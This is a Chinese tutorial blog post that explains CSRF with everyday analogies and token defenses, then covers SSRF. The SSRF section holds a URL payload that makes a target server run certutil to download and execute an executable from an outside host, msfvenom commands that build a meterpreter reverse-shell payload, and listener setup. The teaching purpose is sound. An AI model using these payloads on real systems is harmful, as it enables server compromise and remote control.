CSRF&SSRF&认识与了解

在这里插入图片描述

蓝易云高性能服务器

在这里插入图片描述
|

|

|

|

|

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

🤪🤪🤪🤪🤪🤪点击购买吧-年付送定制U盘

|

|

|

|

|

CSRF

CSRF被称为跨站请求伪造,通常缩写为CSRF或者XSRF,是一种网站恶意利用的攻击,

例子:

一个人发送了一个未知的链接给我,我点开这个链接,我只是单纯的点开了并没有输入什么东西,但是呢我们QQ号和其他的账户莫名的被盗了,那么这种攻击就称为跨站请求伪造,这种攻击可以在受害者不知情的情况下以受害者的名义伪造请求,执行恶意操作。

CSRF攻击条件

  1. 目标用户已经登录了该网站,能在该网站进行操作
  2. 目标用户访问了攻击者伪造的URL

查看源图像

例子:

TOM:TOM登录了XX银行看看自己银行账户上还要多少个亿

黑客:黑客不知道通过什么渠道知道了TOM登录了银行账户,然后呢黑客就伪造了一条银行转账的请求,那么并对这个伪造请求的URL进行外观上的伪造比如说汪峰又出新歌了又有大瓜了点击此链接观看吖,然后发送给TOM

TOM:TOM看到了这个尼玛,有瓜吃肯定点开啊,然后TOM就点开了,

这时候,这个请求伪造链接就会利用TOM这个账户的权限将TOM账户的钱转到了黑客指定的账户上去,然后TOM看完瓜,发现你妹的不见了几个亿

CSRF防御

基本的两个防护策略

同源策略

所谓同源是指"协议+域名+端口"三者相同,即便两个不同的域名指向同一个 ip 地址,也非同源。

简单理解就是你要达到几个相同的地方,才能触发功能

第二个防御办法token

token

Token的定义:Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。

简单的理解就是,当用户登录该账户服务器就会发送一个另外给你不管干嘛都必须要用到这个令牌,并且这个令牌服务器会有备案这个令牌的暂时拥有者是谁,你要转账要有这个令牌,添加用户要有这个令牌

我们打个比方

我去游乐园玩,我买门票的时候,服务员给我了我一张卡,这张卡呢已经在服务器上备案了,此卡xxxxxxxxxxxx编号拥有者xxx,号我拿了这张卡就进去玩了,那么我要玩过山车,我就把卡递给管理员管理员呢有一个验卡的设备,把卡放到设备上滴一下,显示此卡有效以激活备案了,好我就可以进去玩了,那么我玩完过山车去其他地方完了,这时候有一个吊毛假扮我的样子一模一样的,他就去玩过山车,去玩的时候被管理员认到我了,管理员说这个小子不是刚刚玩过了吗,我就来到管理员面前说我要玩过山车,管理员说卡给我我说我没有卡,管理员就不让我玩了,这时候那个小子就知道要卡,那么这小伙子就去服务员哪里偷了一张卡来,又去完过山车,管理员拿了卡滴了一下显示此卡未激活,又不让那个小伙子完了,

小伙子不服气,就去偷我的卡,还真被他偷到了,我发现我卡被偷了我就不完了,我就离开游乐园,那么服务员看我里开了就把服务器上备案激活的卡注销吊了,

那么那个小伙子拿了我的卡很高兴去玩啊但是呢当滴卡的时候显示此卡以注销又不能玩

所有说啊当对方给我发了一个伪造请求他没有我的token我不管怎么访问都不会执行,那么黑客·找了一个token来但是和我服务器上的token不一样也不执行请求,最后黑客破解了我的token又发送给我了,但是呢我已经退出登录了,我之前那个token被服务器回收了,当我再点开伪造请求链接的时候依然不会去执行

SSRF

SSRF称为服务器请求伪造,而前面的CSRF为跨站请求伪造两种不同

查看源图像

SSRF其实就是URL执行漏洞

那么我们发送了一个URL给服务器,当服务器访问或者执行我这个URL的时候就存在SSRF漏洞了

那么服务器能够用访问我发送的URL

那么我们可以在我们的服务器上放一个木马,然后将这个木马的下载链接发送给对方服务器,那么对方服务器就会下载这个木马了

然我们在发送一个执行该木马的URL给服务器服务器就执行了我们的木马

192.168.46.148是目标服务器

-执行:http://192.168.46.148:8080/?search==%00{.exec|xx.exe.}
-下载:http://192.168.46.148:8080/?search==%00{.exec|cmd.exe%20/c%20certutil%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.} 

MSF生成木马

192.168.0.110是黑客服务器本地ip

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe

启动MSF

msfconsole

开启监听

use exploit/multi/handler

设置我们HTTP协议监听

set payload windows/meterpreter/reverse_http

然后输出本地IP

set lhost 192.168.0.110

或者不输入本地ip输入0.0.0.0 就是所有ip的意思

set lhost 0.0.0.0

最后启动监听

explore或者run

SSRF黑盒存在漏洞的地方

-SSRF黑盒可能出现的地方:

1.社交分享功能:获取超链接的标题等内容进行显示

2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览

3.在线翻译:给网址翻译对应网页的内容

4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片

5.图片/文章收藏功能:主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验

6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试

7.网站采集,网站抓取的地方:一些网站会针对你输入的url进行一些信息采集工作

8.数据库内置功能:数据库的比如mongodb的copyDatabase函数

9.邮件系统:比如接收邮件服务器地址

10.编码处理, 属性信息处理,文件处理:比如ffpmg,ImageMagick,docx,pdf,xml处理器等

11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法加上这些关键字去寻找SSRF漏洞

一些的url中的关键字:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……

12.从远程服务器请求资源(upload from url 如discuz!;import & expost rss feed 如web blog;使用了xml引擎对象的地方 如wordpress xmlrpc.php)

https://pxxxxxxx?cpage=91&url=http:xxxx

后面有这个url=xx链接的时候可以尝试更改为http://127.0.0.1如果执行了可能就存在SSRF漏洞了

在这里插入图片描述

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无聊的知识

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值